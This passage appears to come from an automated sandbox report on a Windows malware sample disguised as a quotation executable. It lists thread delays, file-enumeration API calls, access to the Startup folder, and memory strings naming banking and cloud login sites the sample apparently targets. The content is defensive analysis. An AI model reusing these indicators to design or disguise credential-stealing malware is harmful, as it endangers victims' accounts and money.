                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594032Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599620Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599198Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599088Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598956Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598279Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597843Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597624Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597405Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597296Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597187Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597078Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596968Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596859Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596749Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596640Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595923Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595686Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595577Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594265Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2680Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7129Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7441Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2398Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeAPI coverage: 3.5 %
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeAPI coverage: 3.8 %
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F4C2A2 FindFirstFileExW,1_2_00F4C2A2
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F868EE FindFirstFileW,FindClose,1_2_00F868EE
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,1_2_00F8698F
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F7D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00F7D076
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F7D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00F7D3A9
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F89642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00F89642
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F8979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00F8979D
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,1_2_00F7DBBE
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F89B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,1_2_00F89B2B
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F85C97 FindFirstFileW,FindNextFileW,FindClose,1_2_00F85C97
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D9C2A2 FindFirstFileExW,2_2_00D9C2A2
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DD68EE FindFirstFileW,FindClose,2_2_00DD68EE
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DD698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_00DD698F
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DCD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00DCD076
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DCD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00DCD3A9
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DD9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00DD9642
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DD979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00DD979D
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DCDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_00DCDBBE
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DD9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00DD9B2B
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DD5C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00DD5C97
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_00F142DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599558Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598641Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596884Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596778Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596231Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596016Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595216Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594999Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594780Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594559Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594444Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594244Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594141Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594032Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599620Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599198Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599088Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598956Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598279Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597843Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597624Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597405Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597296Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597187Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597078Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596968Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596859Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596749Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596640Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595923Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595686Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595577Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594265Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                  Source: wscript.exe, 00000005.00000002.1556781131.000002937BD04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
